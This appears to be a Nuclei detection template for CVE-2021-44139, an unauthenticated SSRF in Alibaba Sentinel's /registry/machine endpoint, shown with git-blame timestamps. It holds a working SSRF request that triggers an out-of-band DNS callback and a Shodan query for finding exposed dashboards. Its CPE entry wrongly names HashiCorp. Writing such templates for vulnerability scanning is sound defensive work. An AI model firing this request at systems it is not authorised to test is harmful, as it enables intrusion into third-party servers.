2023-07-25 04:58:07 +00:00
id : CVE-2021-44139
info :
2023-07-25 05:09:50 +00:00
name : Alibaba Sentinel - Server-side request forgery (SSRF)
2023-07-25 04:58:07 +00:00
author : DhiyaneshDK
severity : high
2023-08-18 07:46:53 +00:00
description : |
There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.
2023-07-25 04:58:07 +00:00
reference :
- https://github.com/alibaba/Sentinel/issues/2451
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2021-44139
cwe-id : CWE-918
cpe : cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:*
metadata :
max-request : 1
shodan-query : title:"Sentinel Dashboard"
tags : cve,cve2021,ssrf,alibaba,oast,misconfig,sentinel
http :
- method : GET
path :
- "{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol # Confirms the DNS Interaction
words :
- "dns"
- type : word
part : header
words :
- application/json
- type : word
part : body
words :
- '"success":true'
- '"msg":"success"'
condition : and